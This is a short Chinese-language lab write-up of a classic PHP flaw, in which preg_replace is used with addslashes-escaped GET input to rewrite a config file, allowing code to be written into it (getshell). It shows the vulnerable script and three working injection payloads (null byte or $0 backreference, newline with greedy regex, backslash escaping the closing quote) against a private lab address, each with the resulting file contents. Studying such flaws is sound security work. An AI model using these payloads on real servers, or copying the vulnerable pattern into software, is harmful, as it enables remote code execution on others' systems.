@author: Dlive
P牛在小密圈中發的一個有關使用PHP正則配合寫配置文件導致Getshell的經典漏洞
漏洞代碼是這樣的:
<?php
//ph.php
$str = addslashes($_GET['option']);
$file = file_get_contents('option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
var_dump($file);
file_put_contents('option.php', $file);
<?php
//option.php
$option='123';
0x01 利用%00或$0
這是我當時利用的一個方法(感覺我這個方法繞了好大一個彎兒QAQ)
payload:
http://192.168.204.238/test/ph.php?option=;phpinfo();
http://192.168.204.238/test/ph.php?option=%00
第二次傳入的%00換為$0可達到相同效果
參考php手冊對\0或$0的描述:
http://php.net/manual/zh/function.preg-replace.php
\\0和$0代表完整的模式匹配文本
%00被addslashes()轉為\0,而\0在preg_replace函數的第二個參數中代表“匹配到的全部內容”($0同理)
此時preg_replace要執行的代碼如下
preg_replace('|\$option=\'.*\';|',"\$option='\\0';",$file);
或
preg_replace('|\$option=\'.*\';|',"\$option='$0';",$file);
即執行
preg_replace('|\$option=\'.*\';|',"\$option='$option=';phpinfo();';';",$file);
成功閉合單引號寫入如下shell
<?php
$option='$option=';phpinfo();';';
0x02 利用換行符%0a和正則匹配缺陷
第一次傳入 aaa';phpinfo();%0a//
此時文件內容
$option='aaa\';phpinfo();
//';
第二次傳入隨意字符串,如bbb, 正則代碼.*會將匹配到的aaa\替換為bbb (正則匹配的缺陷)
此時文件內容(成功寫入惡意代碼)
$option='bbb';phpinfo();
//';
0x03 利用反斜杠轉義單引號
payload:
http://192.168.204.238/test/ph.php?option=\';phpinfo();//
雖然addslashes將\轉義為\\但是經過preg_replace處理后\\又變為了\
view-source:http://192.168.204.247/test/ph.php?option=\
string(19) "after addslashes:\\"
string(42) "second param of preg_replace:$option='\\';"
string(37) "after preg_replace:<?php
$option='\';"
最后的單引號被反斜杠轉義